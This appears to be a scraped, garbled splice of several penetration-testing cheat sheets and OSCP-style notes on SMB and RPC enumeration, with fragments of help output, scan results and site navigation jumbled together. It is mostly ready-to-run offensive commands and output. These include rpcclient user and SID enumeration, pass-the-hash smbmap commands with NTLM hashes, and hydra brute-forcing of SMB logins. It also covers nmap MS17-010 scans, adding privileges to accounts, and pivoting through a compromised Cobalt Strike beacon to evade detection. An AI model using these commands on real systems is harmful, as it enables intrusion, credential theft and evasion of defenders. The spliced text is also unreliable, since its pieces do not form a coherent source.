S-1-5-21-1835020781-2383529660-3657267081-1013 LEWISFAMILY\mail (2) There are numerous tools and methods to perform enumeration; we will be finding different types of information on SMB throughout the article. Nmap scan report for [ip] Protocol_Name: SMB #Protocol Abbreviation if there is one. [DATA] attacking service smb on port 139 D 0 Thu Sep 27 16:26:00 2018 Honor privileges assigned to specific SID? So let's run rpcclient with no options to see what's available: SegFault:~ cg$ rpcclient. Once proxychains are configured, the attacker can start enumerating the AD environment through the beacon like so: Moving on, same way, they can query info about specific AD users: Enumerate current user's privileges and many more (consult rpcclient for all available commands): Finally, of course they can run nmap if needed: Impacket provides even more tools to enumerate remote systems through compromised boxes. May need to run a second time for success. | getdompwinfo Retrieve domain password info --------------- ---------------------- adddriver Add a print driver 1026 - Pentesting Rusersd. Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging, https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html, https://github.com/SecureAuthCorp/impacket/tree/master/examples, https://www.cobaltstrike.com/help-socks-proxy-pivoting, https://www.youtube.com/watch?v=l8nkXCOYQC4&index=19&list=WL&t=7s, code execution on a target system and the beacon is calling back to the team server, PID 260 - beacon injected into dllhost process. This is an approach I came up with while researching on offensive security. if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi, if [ ! The rpcclient was designed to perform debugging and troubleshooting tasks on a Windows Samba configuration. 
[Original] As I've been working through PWK/OSCP for the last month, one thing I've noticed is that enumeration of SMB is tricky, and different tools . # lines. Curious to see if there are any "guides" out there that delve into SMB . Obviously the SIDS are different but you can still pull down the usernames and start bruteforcing those other open services. queryuseraliases Query user aliases . logonctrl Logon Control After creating the group, it is possible to see the newly created group using the enumdomgroup command. [+] IP: [ip]:445 Name: [ip] Metasploit SMB auxiliary scanners. If this information does not appear in other used tools, you can: # Requires root or enough permissions to use tcpdump, # Will listen for the first 7 packets of a null login, # Will sometimes not capture or will print multiple. Enum4linux. The main application area of the protocol has been the, operating system series in particular, whose network services support SMB in a downward-compatible manner - which means that devices with newer editions can easily communicate with devices that have an older Microsoft operating system installed. --------------- ---------------------- -P, --machine-pass Use stored machine account password offensive security. rpcclient $> help Hashes work. share Disk 445/tcp open microsoft-ds | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx To do this first, the attacker needs a SID. ENUMERATING USER ACCOUNTS ON LINUX AND OS X WITH RPCCLIENT, Hacking Samba on Ubuntu and Installing the Meterpreter. MAC Address: 00:50:56:XX:XX:XX (VMware) getdcname Get trusted DC name Manh-Dung Nguyen Blog Pentest Publications Whoami @ This will attempt to connect to the share. The enum4linux utility within Kali Linux is particularly useful; with it, you can obtain the following: If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very interesting this page about. 
While Port 139 is known technically as NBT over IP, Port 445 is SMB over IP. rffpcnex Rffpcnex test rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1013 querygroupmem Query group membership [INFO] Reduced number of tasks to 1 (smb does not like parallel connections) To extract further information about that user, or in case during the other enumeration the attacker comes across the SID of a user, they can use the lookupsids command to get more information about that particular user. [hostname] <20> - M | A critical remote code execution vulnerability exists in Microsoft SMBv1 Query Group Information and Group Membership. Further, when the attacker used the same SID as a parameter for lsaenumprivaccount, they were able to enumerate the levels of privileges such as high, low, and attribute. Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out. queryusergroups Query user groups S-1-5-21-1835020781-2383529660-3657267081-1011 LEWISFAMILY\operator (2) rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1003 IS~[hostname] <00> - M 1690825 blocks of size 2048. result was NT_STATUS_NONE_MAPPED. -N, --no-pass Don't ask for a password samlookuprids Look up names null session or valid credentials). It can be used on the rpcclient shell that was generated to enumerate information about the server. That command reveals the SIDs for different users on the domain. Passing the SID as a parameter in the lsacreateaccount command will enable us as an attacker to create an account object as shown in the image below. In our previous attempt to enumerate SID, we used the lsaenumsid command. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2003 guest access disabled, uses encryption. 
---- ----------- | State: VULNERABLE If you want to enumerate all the shares then use netshareenumall. In the demonstration presented, there are two domains: IGNITE and Builtin. Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds. SeSecurityPrivilege 0:8 (0x0:0x8) Learning about various kinds of compromises that can be performed using Mimikatz we know that the SID of a user is the security Identifier that can be used for a lot of elevating privileges and minting tickets attacks. authentication -A, --authentication-file=FILE Get the credentials from a file Code & Process Injection. smbmap -u '' -p '' -H $ip # similar to crackmapexec --shares, smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip, smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dir, smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursively, smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '. Hence, the credentials were successfully enumerated and the account can be taken over now. netname: PSC 2170 Series C$ NO ACCESS It is also possible to add and remove privileges to a specific user as well. It has undergone several stages of development and stability. rpcclient $> lookupnames lewis 4. Running something like ngrep -i -d tap0 's.?a.?m.?b.?a. srvinfo Server query info Cracking Password. maybe brute-force ; 22/SSH. shutdown Remote Shutdown But it is also possible to get the password properties of individual users using the getusrdompwinfo command with the users RID. To demonstrate this, the attacker first used the lsaaddpriv command to add the SeCreateTokenPrivielge to the SID and then used the lsadelpriv command to remove that privilege from that group as well. 
Many system administrators have now written scripts around it to manage Windows NT clients from their UNIX workstation. -c, --command=COMMANDS Execute semicolon separated cmds Port_Number: 137,138,139 #Comma separated if there is more than one. | grep -oP 'UnixSamba. First one - two Cobalt Strike sessions: Second - attacker opens a socks4 proxy on port 7777 on his local kali machine (10.0.0.5) by issuing: {% code-tabs %} Then the attacker used the SID to enumerate the privileges using the lsaenumacctrights command. Ill include examples, but where I use PWK labs, Ill anonymize the data per their rules. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network. This is what happens - attacker (10.0.0.5) uses proxychains with impacket's reg utility to retrieve the hostname of the box at 10.0.0.7 (WS02) via the compromised (CS beacon) box 10.0.0.2 (WS01): The below shows traffic captures that illustrate that the box 10.0.0.2 enumerates 10.0.0.7 using SMB traffic only: Below further proves that the box 10.0.0.2 (WS01 which acted as proxy) did not generate any sysmon logs and the target box 10.0.0.7 (WS02) logged a couple of events, that most likely would not attract much attention from the blue teams: Note how only the SMB traffic between the compromised system and the DC is generated, but no new processes are spawned by the infected dllhost process: {% embed url="https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html" %}, {% embed url="https://github.com/SecureAuthCorp/impacket/tree/master/examples" %}, {% embed url="https://www.cobaltstrike.com/help-socks-proxy-pivoting" %}, {% embed url="https://www.youtube.com/watch?v=l8nkXCOYQC4&index=19&list=WL&t=7s" %}. 
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1001 139/tcp open netbios-ssn Let's see how this works by firstly updating the proxychains config file: Once proxychains are configured, the attacker can start enumerating the AD environment through the beacon like so: proxychains rpcclient 10.0.0.6 -U spotless, Victim (10.0.0.2) is enumerating DC (10.0.0.6) on behalf of attacker (10.0.0.5). Shortcut to New Folder (2).lnk A 420 Sun Dec 13 05:24:51 2015 What permissions must be assigned to the newly created files? We have enumerated the users and groups on the domain but not enumerated the domain itself. Upon running this on the rpcclient shell, it will extract the groups with their RID. Common share names for windows targets are, You can try to connect to them by using the following command, # null session to connect to a windows share, # authenticated session to connect to a windows share (you will be prompted for a password), "[+] creating a null session is possible for, # no output if command goes through, thus assuming that a session was created, # echo error message (e.g. result was NT_STATUS_NONE_MAPPED . C$ NO ACCESS In general, the rpcclient can be used to connect to the SMB protocol as well. Since we performed enumeration on different users, it is only fair to extend this to various groups as well. Guest access disabled by default. May need to run a second time for success. If in the above example the ttl=127, then it is safe to assume (from this information alone) that the host, 10.10.10.10, is a Linux host. netfileenum Enumerate open files exit Exit program Adding it to the original post. So, it is also a good way to enumerate what kind of services might be running on the server, this can be done using enumdomgroup. This command helps the attacker enumerate the security objects or permissions and privileges related to the security as demonstrated below. Disk Permissions Test. A Little Guide to SMB Enumeration. 
rpcclient $> enumprivs enumdrivers Enumerate installed printer drivers SegFault:~/Documents/Evil cg$ hydra -l lewis -P common-passwords.txt 192.168.182.36 smb -V Enter WORKGROUP\root's password: #These are the commands I run in order every time I see an open SMB port, smbclient -N //{IP}/ --option="client min protocol"=LANMAN1, crackmapexec smb {IP} --pass-pol -u "" -p "", crackmapexec smb {IP} --pass-pol -u "guest" -p "", GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all, GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat, GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/", smbmap -H {IP} -u {Username} -p {Password}, smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}, smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`, crackmapexec smb {IP} -u {Username} -p {Password} --shares, GetADUsers.py {Domain_Name}/{Username}:{Password} -all, GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat, GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request, https://book.hacktricks.xyz/pentesting/pentesting-smb, Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}, Description: SMB Vuln Scan With Nmap (Less Specific), Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}, Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb, Name: SMB/SMB2 139/445 consolesless mfs enumeration, Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole, Note: sourced from https://github.com/carlospolop/legion, Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q 
-x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'. 623/UDP/TCP - IPMI. This group constitutes 7 attributes, and 2 users are members of this group. # lines. -d, --debuglevel=DEBUGLEVEL Set debug level After that command was run, rpcclient will give you the most excellent "rpcclient> " prompt. May need to run a second time for success. [hostname] <00> - M --------- ------- The next command to demonstrate is lookupsids. rpcclient $> queryuser msfadmin. Host script results: | \\[ip]\share: NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME), # returns NT_STATUS_ACCESS_DENIED or even gives you a session. deletedomuser Delete domain user --------- -------, Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-27 16:25 EDT S-1-5-21-1835020781-2383529660-3657267081-2003 LEWISFAMILY\user (2) rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1004 In this article, we are going to focus on the enumeration of the Domain through the SMB and RPC channels. samsync Sam Synchronisation Nice! Since we already performed the enumeration of such data before in the article, we will enumerate using enumdomgroup and enumdomusers and the query-oriented commands in this demonstration. 1080 - Pentesting Socks. rpcclient is a part of the Samba suite on Linux distributions. Learn more about the OS Versions. IPC$ NO ACCESS It can be enumerated through rpcclient using the lsaenumsid command. | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | Comment: Remote Admin Beyond the enumeration I show here, it will also help enumerate shares that are readable, and can even execute commands on writable shares. Hydra v5.1 (c) 2005 by van Hauser / THC - use allowed only for legal purposes. 
enumdomusers Enumerate domain users rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1015 --------------- ---------------------- Checklist - Local Windows Privilege Escalation, Pentesting JDWP - Java Debug Wire Protocol, 161,162,10161,10162/udp - Pentesting SNMP, 515 - Pentesting Line Printer Daemon (LPD), 548 - Pentesting Apple Filing Protocol (AFP), 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP, 1433 - Pentesting MSSQL - Microsoft SQL Server, 1521,1522-1529 - Pentesting Oracle TNS Listener, 2301,2381 - Pentesting Compaq/HP Insight Manager, 3690 - Pentesting Subversion (svn server), 4369 - Pentesting Erlang Port Mapper Daemon (epmd), 8009 - Pentesting Apache JServ Protocol (AJP), 8333,18333,38333,18444 - Pentesting Bitcoin, 9100 - Pentesting Raw Printing (JetDirect, AppSocket, PDL-datastream), 10000 - Pentesting Network Data Management Protocol (ndmp), 24007,24008,24009,49152 - Pentesting GlusterFS, 50030,50060,50070,50075,50090 - Pentesting Hadoop, Reflecting Techniques - PoCs and Polygloths CheatSheet, Dangling Markup - HTML scriptless injection, HTTP Request Smuggling / HTTP Desync Attack, Regular expression Denial of Service - ReDoS, Server Side Inclusion/Edge Side Inclusion Injection, XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations), Pentesting CI/CD (Github, Jenkins, Terraform), Windows Exploiting (Basic Guide - OSCP lvl), INE Courses and eLearnSecurity Certifications Reviews, Stealing Sensitive Information Disclosure from a Web, Enumerate Users, Groups & Logged On Users, Manually enumerate windows shares and connect to them, . lookupdomain Lookup Domain Name | Current user access: Nmap done: 1 IP address (1 host up) scanned in 5.58 seconds, # Requires root or enough permissions to use tcpdump, # Will listen for the first 7 packets of a null login, # Will sometimes not capture or will print multiple. 
This cheat sheet should not be considered to be complete and only represents a snapshot in time when I used these commands for performing enumeration during my OSCP journey. Server Comment In the demonstration, it can be observed that the SID that was enumerated belonged to the Administrator of the Builtin users. |_ Current user access: READ | Current user access: READ/WRITE The below shows a couple of things. getdriver Get print driver information and therefore do not correspond to the rights assigned locally on the server. SQL Injection & XSS Playground. Dec 2, 2018, PWK Notes: SMB Enumeration Checklist [Updated]. When it was passed as a parameter in the command lookupsids, the attacker was able to know that this belongs to the group Everyone. Initial Access. For instance, on Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. Let's see how this works by firstly updating the proxychains config file: This command will show you the shares on the host, as well as your access to them. When used with the builtin parameter, it shows all the built-in groups by their alias names as demonstrated below. Allow connecting to the service without using a password? password: guest S-1-5-21-1835020781-2383529660-3657267081-1063 (Local Group: 4) S-1-5-21-1835020781-2383529660-3657267081-1003 LEWISFAMILY\daemon (2) -k, --kerberos Use kerberos (active directory) MAC Address = 00-50-56-XX-XX-XX, [+] Finding open SMB ports. Similarly, enumerating the Primary Domain Information, such as the Role of the machine and the Native mode of the Domain, can be done using the dsroledominfo command as demonstrated. 631 - Internet Printing Protocol (IPP) 873 - Pentesting Rsync. | IDs: CVE:CVE-2006-2370 Sharename Type Comment SMB stands for Server Message Blocks. Hydra (http://www.thc.org) starting at 2007-07-27 21:51:46 schannel Force RPC pipe connections to be sealed with 'schannel' (NETSEC). 
When provided with the username to the samlookupnames command, it can extract the RID of that particular user. . *[[:digit:]]' port 139 in one terminal and then echo exit | smbclient -L [IP] in another will dump out a bunch of info including the version. dsenumdomtrusts Enumerate all trusted domains in an AD forest The connection uses. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2000 WORKGROUP <00> - M enumprivs Enumerate privileges S-1-5-21-1835020781-2383529660-3657267081-1007 LEWISFAMILY\sys (2) The manipulation of the groups is not limited to the creation of a group. to access through Web; FTP to file upload ==> Execute from web == webshell ; Password Checking if you found with other enum. Get help on commands If the permissions allow, an attacker can delete a group as well. With --pw-nt-hash, the pwd provided is the NT hash, #Use --no-pass -c 'recurse;ls' to list recursively with smbclient, #List with smbmap, without folder it list everything. This is newer version of SMB. A NetBIOS name is up to 16 characters long and usually, separate from the computer name. | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) Workgroup Master deldriverex Delete a printer driver with files WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort -?, --help Show this help message rpcclient -U '%' -N <IP> Web-Enum . In the previous command, we used the getdompwinfo to get the password properties of the domain administrated by the policies. Wordlist dictionary. This is what happens - attacker (10.0.0.5) uses proxychains with impacket's reg utility to retrieve the hostname of the box at 10.0.0.7 (WS02) via the compromised (CS beacon) box 10.0.0.2 (WS01): keyName hklm\system\currentcontrolset\control\computername\computername.